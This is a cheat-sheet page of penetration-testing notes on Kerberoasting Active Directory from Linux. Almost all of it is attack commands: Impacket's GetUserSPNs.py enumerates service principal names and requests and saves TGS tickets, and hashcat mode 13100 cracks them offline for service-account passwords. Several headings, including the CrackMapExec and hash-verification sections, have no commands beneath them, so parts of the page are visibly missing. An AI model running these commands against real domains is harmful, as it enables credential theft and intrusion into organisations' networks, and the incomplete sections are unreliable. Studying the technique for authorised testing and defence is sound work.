search

14.Kerberoasting - from Linux

Installation (if needed):

sudo python3 -m pip install .  # Installs Impacket from the current directory
sudo pip3 install impacket    # Alternative, if available from pip repositories

Help:

GetUserSPNs.py -h  # Displays help options

List SPNs (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>  # Replace <DC_IP>, <DOMAIN>, and <USER> with actual values. Prompts for password.

Request TGS Tickets (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request

Request TGS Ticket (specific user):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER>

Request and Save TGS Ticket:

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER> -outputfile <OUTPUT_FILE>  # Replace <OUTPUT_FILE> with the desired filename.

hashtag
Hashcat (Linux):

Crack TGS Ticket:

hashcat -m 13100 <TGS_FILE> <WORDLIST>  # Replace <TGS_FILE> with the ticket file and <WORDLIST> with the wordlist path.
hashcat -m 13100 <TGS_FILE> <WORDLIST> --force  # Adds the --force option, useful when hashcat detects potential errors with the hash.
hashcat -m 13100 <TGS_FILE> <WORDLIST> -o <CRACKED_FILE>  # Adds the -o option to output the cracked password to a file.

hashtag
CrackMapExec (Linux):

Test Authentication:

hashtag
Verification of Extracted Hashes:

Before cracking, verify the extracted TGS hashes:

This helps confirm that the ticket is properly extracted.

hashtag
Interactive Shell Variants:

If running GetUserSPNs.py over SSH or in a restricted shell, use:

Or execute the script in a non-interactive mode:

This ensures the process runs even after logging out.

hashtag
Alternative Tools for SPN Enumeration:

  1. kerbrute - Fast SPN brute-forcing and enumeration.

  2. BloodHound - Visualizing AD attack paths.

Previous6.Cooking with FireNext15. Kerberoasting - from Windows

Last updated